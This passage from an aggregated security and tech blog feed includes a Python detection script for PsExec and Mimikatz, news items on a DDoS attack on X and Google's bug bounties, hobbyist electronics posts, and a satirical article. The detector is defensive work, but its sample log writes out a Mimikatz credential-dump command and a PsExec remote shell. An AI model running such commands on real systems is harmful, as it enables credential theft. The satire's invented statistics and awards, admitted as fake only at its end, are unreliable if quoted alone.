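Added example, not Kaspersky's or GERT's detection rules. SAMPLE_LOG is
constructed: Sysmon-like key=value lines, Event ID 1 = process creation,
Event ID 7045 = service installation.
"""
import re
from collections import namedtuple

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# OriginalFileName comes from the PE version resource, so it survives a rename
# of the file on disk. PsExec's is the odd-looking "psexec.c".
PSEXEC_ORIGINAL_NAMES = {"psexec.c", "psexesvc.exe"}
PSEXEC_IMAGE_NAMES = {"psexec.exe", "psexec64.exe"}
MIMIKATZ_CMD_MARKERS = ("sekurlsa::", "lsadump::", "privilege::debug", "kerberos::ptt")

Finding = namedtuple("Finding", "rule subject detail")

SAMPLE_LOG = [  # constructed sample events, not real telemetry
    r'EventID=1 Image=C:\Windows\Temp\svchost64.exe OriginalFileName=psexec.c CommandLine="svchost64.exe \\10.0.0.5 -s -d cmd.exe" User=CORP\jsmith',
    r'EventID=1 Image=C:\Users\jsmith\Downloads\m.exe OriginalFileName=mimikatz.exe CommandLine="m.exe privilege::debug sekurlsa::logonpasswords exit" User=CORP\jsmith',
    r'EventID=1 Image="C:\Program Files\Git\bin\git.exe" OriginalFileName=git.exe CommandLine="git status" User=CORP\jsmith',
    r'EventID=7045 ServiceName=PSEXESVC ImagePath=%SystemRoot%\PSEXESVC.exe StartType=demand',
    r'EventID=1 Image=C:\Windows\System32\notepad.exe OriginalFileName=NOTEPAD.EXE CommandLine="notepad.exe notes.txt" User=CORP\jsmith',
]


def parse_event(line):
    """key=value fields; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Apply the rules to one parsed event; returns a list of Finding."""
    findings = []
    eid = ev.get("EventID")
    if eid == "1":
        image = ev.get("Image", "")
        base = _basename(image)
        orig = ev.get("OriginalFileName", "").lower()
        cmd = ev.get("CommandLine", "").lower()
        # Renamed PsExec still carries OriginalFileName=psexec.c.
        if orig in PSEXEC_ORIGINAL_NAMES or base in PSEXEC_IMAGE_NAMES:
            findings.append(Finding("psexec_execution", image, f"OriginalFileName={orig}"))
        if orig == "mimikatz.exe" or base == "mimikatz.exe":
            findings.append(Finding("mimikatz_binary", image, f"OriginalFileName={orig}"))
        # Module syntax on the command line catches recompiled/renamed builds too.
        hits = [m for m in MIMIKATZ_CMD_MARKERS if m in cmd]
        if hits:
            findings.append(Finding("mimikatz_commandline", image, ", ".join(hits)))
    elif eid == "7045":
        svc = ev.get("ServiceName", "").lower()
        path = ev.get("ImagePath", "")
        # PsExec installs its service on the target before running the command.
        if svc == "psexesvc" or _basename(path) == "psexesvc.exe":
            findings.append(Finding("psexec_service_install", path, f"ServiceName={svc}"))
    return findings


def scan(lines):
    """Run every rule over every line, preserving event order."""
    return [f for line in lines for f in evaluate(parse_event(line))]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.rule:24} {f.subject}  ({f.detail})")
```

Two caveats a practitioner will want: the version resource can be patched and PsExec's service name can be changed with `-r`, so these rules are a floor, not a ceiling; pair them with LSASS access telemetry (Sysmon Event ID 10) and with the "prohibit software known to be abused by attackers" recommendation above, so that a hit on a host where the tool is not sanctioned is actionable on its own.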

The full 2024 Incident Response Report features additional information about real-life incidents, including new threats discovered by Kaspersky experts. We also take a closer look at APT activities, providing statistics for the most prolific groups. The report includes comprehensive analysis of initial attack vectors in correlation with the MITRE ATT&CK tactics and techniques and the full list of vulnerabilities that we detected during incident response engagements.


securelist.com/kaspersky-incid…


Fake news: international study reveals it’s all the fault of AI and online anonymity


The first report from the analysis conducted by the McGuffin project, which involved more than 23 countries through an investigative task force coordinated with universities and specialist research centres, has confirmed an alarming finding: with the development of LLMs, the fake news alarm is more topical than ever and calls for legislation to regulate the use of Artificial Intelligence and access to and participation in social networks. One of the most worrying factors is online anonymity, which according to the studies is closely correlated with the production and spread of fake news.

According to the data provided, the Bloom coefficient, the main international parameter used to analyse the ability of the major social networks’ systems to assess how dangerous false news is, gives rather alarming indicators:

  • it has an average value between 4 and 8 in countries where the use of social networks and LLMs is heavily restricted;
  • it has an average value between 15 and 16 in countries where social networks are widely used but LLMs are not;
  • it has an average value of 32 in countries where both social networks and LLMs are widespread, with peaks of 42 where online anonymity is guaranteed and there is no legislation on Artificial Intelligence.

On the one hand, Artificial Intelligence must be regulated, with a legal requirement to build in corrective ethical parameters that promote true news and penalise fake news. This intervention cannot be called sufficient on its own, however, which is why the studies by Smith, awarded the Nobel Prize for Information in 1984, have been cited: they demonstrated a correlation between a rising Bloom coefficient and a decrease in authors who publish under their own name, opting instead for a pseudonym or anonymity.
Smith’s projection of the correlation between the rise in the Bloom coefficient and the decline in identifiable authors over time.
This should prompt some reflection: with modern technologies and social networks, how much more alarming would Smith’s projection be if it were updated? That is why online anonymity, above all on social networks, must be reduced to the bare minimum (e.g. only for law enforcement, moderators or the platform’s official fact-checkers). In any case, access must require authentication provided by the State (e.g. via SpID).

Otherwise it will never be possible to guarantee a healthy and safe social ecosystem. Above all for minors, the first to be put at risk by online anonymity.

Hence the confirmed need for urgent legislative intervention on the matter. Severe penalties will not be enough, and not only for those who spread fake news produced with Artificial Intelligence: anyone who registers on a social network under a false name must also be punished, since that is the precondition for every unlawful activity carried out on the platform.

Conclusions: fake news and the reader’s role


What conclusions can be drawn?

That everything you have read up to this point is fake news!

And come to think of it: re-reading the title, it now takes on a whole different meaning, doesn’t it?

Moreover, the role of whoever reads the news is fundamental! And it must remain so, because only the person who approaches the news is the indispensable fact-checker who freely applies their own critical thinking, searches for sources, interprets data and evaluates both substance and method. And reads an article all the way through, getting this far. Where I reveal the trick and the game.

A careful reader could easily have spotted all the article’s inconsistencies, as well as the absence of verifiable sources. This was nothing more than a practical demonstration of how a fake news story can be engineered on a particularly sensitive topic. Like fake news itself, in fact. With a sprinkling of fashionable Artificial Intelligence. And unproven hostility towards online anonymity, which is instead a safeguard of freedom, recognised moreover among the fundamental rights of the Internet (Italy’s “Declaration of Internet Rights”, art. 10).

A fake news story must indeed be enticing, tickle various cognitive biases, take on an appearance of authority and present who knows what unproven objective realities, carefully chosen wording and so on. All well-known ingredients that induce people to share it by leveraging emotion and counting on a reduced capacity for critical thinking.

The cocktail is thus a mix of indignation, a sense of danger and everything we want to believe in order to adopt easy solutions which, as it happens, are conveniently on offer. Without, of course, stating their cost, which is often the compression of fundamental rights and freedoms. However intoxicating in the moment, it offers easy illusions and a rude awakening. Which is always an experience nonetheless, better still if approached as a lesson learned.

Trusting that the nerdy references made the deception more enjoyable (or rather: happy easter egg hunting!), I take my leave with the words of the Bard:

If we shadows have offended,
Think but this, and all is mended,
That you have but slumber’d here
While these visions did appear.
And this weak and idle theme,
No more yielding but a dream,
Gentles, do not reprehend:
If you pardon, we will mend:

And, as I am an honest Puck,
If we have unearned luck
Now to ’scape the serpent’s tongue,
We will make amends ere long;
Else the Puck a liar call;
So, good night unto you all.
Give me your hands, if we be friends,
And Robin shall restore amends.


The article Fake news: international study reveals it’s all the fault of AI and online anonymity originally appeared on il blog della sicurezza informatica.


Attack on X: Has the Culprit Been Found? The Investigation Points in an Unexpected Direction!


The cyberattack on X, Elon Musk’s social network, has triggered a full-blown hunt for those responsible. After Musk’s own statements attributing the attack to Ukrainian sources, the event has taken on a significant geopolitical dimension, especially in light of the recent meeting between President Volodymyr Zelensky and Donald Trump.
Dark Storm team’s profile on X

The attack and its consequences


The DDoS attack, attributed to the group known as “Dark Storm”, caused significant outages on the X platform, with intermittent disruptions for several hours. According to some cybersecurity experts, the timing of the attack may not be coincidental, coming shortly after the Zelensky–Trump meeting, an event that may have influenced the strategy of cyber-related actors.

The hunt for those responsible


After the attack, the OSINT (Open Source Intelligence) community and various independent researchers began investigating the identity of the actors behind Dark Storm. A user going by “lulagain”, active on dark web forums, published an alleged leak with information on one of the group’s members, including images and links to X profiles.

One of the most notable posts appeared on X from the researcher Baptiste Robert (@fs0c131y), who claimed to have identified those responsible for the attack and said he was available to discuss the matter directly with Elon Musk in Washington.

The OSINT analysis reportedly led to the identification of a possible member of the group, whose images were circulated on underground forums and on social media.
Post on BreachForums highlighting the tweet by @fs0c131y

Political and security implications


The attack has raised questions about the security of the X platform and its vulnerability to cyber threats. Moreover, the hypothesis of Ukrainian involvement suggested by Musk has sparked debate about the real motives behind Dark Storm’s action. Is it an independent group, or an operation orchestrated within a broader cyber warfare context?

Investigations continue, and if the OSINT analyses prove correct, we may soon see further developments regarding the true identity of the hackers behind Dark Storm and their connections with state or private actors. In the meantime, X’s security remains under scrutiny and the case continues to be debated by the public and by industry experts.
Tweet by @fs0c131y showing the person behind the attack on X, identified through OSINT analysis

Conclusions


The DDoS attack carried out by Dark Storm against X is a clear example of how hacktivists use publicly accessible tools such as Check-host.net (an availability checker, which shows that a site is down but says nothing about who caused it) to demonstrate the effectiveness of their operations. The publication of “proof” on Telegram and BreachForums highlights an established modus operandi: hit high-profile targets and publicly claim the actions to gain visibility and approval within their communities.

X’s response, activating Cloudflare protection to mitigate the impact of the attacks, shows how digital platforms are adopting increasingly sophisticated measures to defend against cyber threats. Introducing a CAPTCHA to filter suspicious traffic is an immediate and effective countermeasure, but it raises questions about scalability and usability for legitimate users.

This episode once again underlines the growing importance of cybersecurity in today’s digital landscape. DDoS attacks, increasingly used as a tool of political protest and destabilisation, require technology companies to continuously evolve their defensive strategies. The Dark Storm vs X case is just the latest demonstration that the cyber conflict between hacktivists and large platforms is set to continue, with new tactics and countermeasures in constant development.

The article Attack on X: Has the Culprit Been Found? The Investigation Points in an Unexpected Direction! originally appeared on il blog della sicurezza informatica.


$11.8 Million Is the Record Sum Google Pays Bug Hunters: Here’s Who Earned the Most!


Google has announced that it paid $11.8 million in rewards to 660 security researchers in 2024 for the vulnerabilities they discovered.

According to the company, since the launch of its first Vulnerability Reward Program (VRP) in 2010, Google has paid out more than $65 million in bug bounties to researchers.

Last year Google revised its reward structure, offering researchers up to $151,515 under the Google VRP and Cloud VRP, up to $300,000 under the Mobile VRP and up to $250,000 for critical vulnerabilities in the Chrome browser.

As a result, in 2024 researchers who reported vulnerabilities in Android and Google mobile apps received $3.3 million, and the number of critical and high-severity reports rose even as the overall number of bugs fell.

A further 137 researchers who reported issues in Chrome received rewards totalling $3.4 million. The highest single reward was $100,115, paid for a MiraclePtr bypass. Notably, in August of last year Google raised the reward for bypassing MiraclePtr to $250,128.

In addition, since the launch of the Cloud VRP bug bounty program in October 2024, the company has received more than 400 vulnerability reports and paid researchers more than $500,000. The company paid more than $290,000 for issues reported through the Abuse VRP.

Under the bug bounty program for flaws in artificial intelligence, the company received more than 150 reports from specialists and ultimately paid them more than $55,000 in rewards.

Another $370,000 went to incentives for two bugSWAT events. Bug hunters who took part in the contest aimed at finding problems in LLM products received more than $87,000.

The article $11.8 Million Is the Record Sum Google Pays Bug Hunters: Here’s Who Earned the Most! originally appeared on il blog della sicurezza informatica.


Classy Paper Tape Reader Complements Homebrew Retrocomputer


If you were one of the earliest of early adopters in the home computing revolution, you might have had to settle for paper tape mass storage. It was slow, it was bulky, but it was what you had, and that gave it a certain charm that’s hard to resist. And that charm is what [Joshua Coleman] captures with this DIY paper tape reader build.

If the overall style of this project looks familiar, it’s because it was meant to echo the design themes from [Joshua]’s Coleman Z-80 modular computer. The electronics of the reader are based on [David Hansel]’s take on a paper tape reader, which in turn was meant to complement his Altair 8080 simulator — it’s retrocomputers all the way down! [Joshua]’s build has a few bells and whistles to set it apart, though, including an adjustable read head, parametric 3D-printed reels, and a panel-mounted ammeter, just because. He also set it up to be a sort of keyboard wedge thanks to an internal relay that bypasses the reader unless it’s actually playing back a tape. Playback speed is pretty fast; see the video below for details.

So far, writing the tapes is an offline process. [Joshua] uses a Python program to convert ASCII to an SVG file and uses a laser cutter to burn holes in lengths of paper, which are then connected together to form a longer tape. A logical next step might be to build a feeder that moves a paper tape across the bed of the laser cutter in sync with the conversion program, to create continuous paper tapes. Or, there’s always the old-school route of solenoid-powered punch and die. We’d be thrilled with either.
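The ASCII-to-SVG step above is simple enough to show in full. The following is an added example, not [Joshua]’s program: it maps each character to a row of holes on 8-track tape and emits an SVG of circles for a laser cutter. The physical layout it assumes (1-inch tape, 0.1-inch row and track pitch, track 1 = bit 0 nearest one edge, feed hole between tracks 3 and 4, 0.072-inch data holes and 0.046-inch feed holes) is the common 8-level standard, but the article does not state [Joshua]’s exact dimensions, so treat the constants as assumptions; the even-parity option in track 8 is likewise an added convenience.

```python
"""ASCII to 8-level paper tape, emitted as SVG for a laser cutter.

Added example, not [Joshua Coleman]'s converter. Layout constants are the
usual 1-inch 8-track figures and are assumptions, not from the article.
"""
ROW_PITCH = 0.1        # inches between rows along the tape
TRACK_PITCH = 0.1      # inches between tracks across the tape
EDGE_MARGIN = 0.15     # centre of track 1 from the reference edge
TAPE_WIDTH = 1.0       # inches
DATA_HOLE = 0.072      # diameter, inches
FEED_HOLE = 0.046      # diameter, inches
FEED_Y = EDGE_MARGIN + 2.5 * TRACK_PITCH   # sprocket hole between tracks 3 and 4


def tape_rows(text, parity=True):
    """One list of 8 bits per character; index 0 = track 1 = least significant bit."""
    rows = []
    for ch in text.encode("ascii"):
        bits = [(ch >> i) & 1 for i in range(7)]
        if parity:
            bits.append(sum(bits) % 2)   # even parity in track 8
        else:
            bits.append((ch >> 7) & 1)   # raw bit 7 (always 0 for ASCII)
        rows.append(bits)
    return rows


def hole_positions(rows):
    """(x, y, diameter) in inches for every hole to cut; x runs along the tape."""
    holes = []
    for r, bits in enumerate(rows):
        x = (r + 1) * ROW_PITCH
        for track, bit in enumerate(bits):
            if bit:
                holes.append((x, EDGE_MARGIN + track * TRACK_PITCH, DATA_HOLE))
        holes.append((x, FEED_Y, FEED_HOLE))   # every row gets a feed hole
    return holes


def tape_svg(text, parity=True):
    """SVG document whose user units are inches, one circle per hole."""
    rows = tape_rows(text, parity)
    length = (len(rows) + 1) * ROW_PITCH
    parts = [f'<svg xmlns="http://www.w3.org/2000/svg" width="{length}in" '
             f'height="{TAPE_WIDTH}in" viewBox="0 0 {length} {TAPE_WIDTH}">']
    for x, y, d in hole_positions(rows):
        parts.append(f'<circle cx="{x:.3f}" cy="{y:.3f}" r="{d / 2:.3f}" '
                     f'fill="none" stroke="red" stroke-width="0.005"/>')
    parts.append("</svg>")
    return "\n".join(parts)


if __name__ == "__main__":
    print(tape_svg("HELLO"))
```

Holes are drawn as unfilled strokes because most laser-cutter software treats a thin stroke as a cut path and a filled shape as an engrave; check which convention your cutter expects before sending a long tape.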

youtube.com/embed/FqEwnl9ZPYk?…


hackaday.com/2025/03/11/classy…


Lies, Damned Lies, And IGBT Datasheets


We have all seen optimistic claims for electronic products which fail to match the reality, and [Electronic Wizard] is following one up in a recent video. Can a relatively small IGBT really switch 200 A as claimed by a dubious seller? Off to the datasheet to find out!

The device in question is from Toshiba and comes in a TO-220 package. This itself gives us pause, because we suspect the pins on a TO-220 would act more like fuses at a steady 200 A.

But there it is in the datasheet: 200 A. Which would be great, except that this turns out to be the instantaneous maximum current for a pulse lasting a few microseconds. Even then it’s not finished, because while the continuous current is supposed to be half that, the datasheet specifies it at a junction temperature of 25 Celsius. The cooling rig required to hold the junction at 25 °C with this transistor passing that much current would, we think, be a sight to behold, so for all practical purposes this part can’t even switch a continuous 100 A. The real figure is much lower, as you’d imagine, but it raises an important point: we blindly read datasheets and trust the headline numbers, when sometimes we should engage brain before releasing the magic smoke.

youtube.com/embed/sIabnsGmGBY?…


hackaday.com/2025/03/11/lies-d…